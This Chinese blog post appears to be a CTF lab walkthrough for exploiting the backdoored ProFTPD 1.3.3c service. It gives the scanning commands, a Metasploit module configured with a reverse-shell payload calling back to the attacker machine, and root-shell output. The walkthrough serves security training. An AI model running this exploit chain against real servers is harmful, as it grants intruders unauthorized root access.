ctf图文讲解-FTP后门服务利用

9 篇文章 4 订阅

首先进行靶机发现

netdiscover -r 靶机IP网段

在这里插入图片描述

发现靶机,对靶机进行操作系统版本扫描

nmap -sV 靶机IP

在这里插入图片描述

发现21端口版本号为 ProFTPD 1.3.3c

通过searchsploit查看对应版本号漏洞文件

searchsploit ProFTPD 1.3.3c

在这里插入图片描述
查看文件

cat /usr/share/exploitdb/exploits/linux/remote/15662.txt

在这里插入图片描述
在这里插入图片描述
很多情况下我们可以通过这些文件来判断如何去进行攻击,kail大多数都是把攻击方法写进文件,然后我们就可以通过读取文件信息来进行下一步。

(英语真的很重要)

进入msf

msf > 
msf > search ProFTPD 1.3.3c

在这里插入图片描述
使用exploit/unix/ftp/proftpd_133c_backdoor 这个模块backdoor是后门的意思

使用并配置模块

msf > use exploit/unix/ftp/proftpd_133c_backdoor 
msf exploit(unix/ftp/proftpd_133c_backdoor) > 

查看payloads(有效载荷,有效负荷,有效载重)

msf exploit(unix/ftp/proftpd_133c_backdoor) > show payloads
msf exploit(unix/ftp/proftpd_133c_backdoor) > set payload cmd/unix/reverse
payload => cmd/unix/reverse

在这里插入图片描述

填写IP

msf exploit(unix/ftp/proftpd_133c_backdoor) > set rhost 靶机IP
rhost => 靶机IP
msf exploit(unix/ftp/proftpd_133c_backdoor) > set lhost kail的IP
lhost => kail的IP

在这里插入图片描述

运行

msf exploit(unix/ftp/proftpd_133c_backdoor) > exploit
id	#查看当前用户权限
uid=0(root) gid=0(root) groups=0(root),65534(nogroup)

在这里插入图片描述

优化界面

python -c "import pty;pty.spawn('/bin/bash')"        
root@vtcsec:/# 

在这里插入图片描述
发现我们已经是root了,直接找flag吧。
如果不是root需要提权请看这个https://blog.csdn.net/weixin_45441727/article/details/114643796

  • 2
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值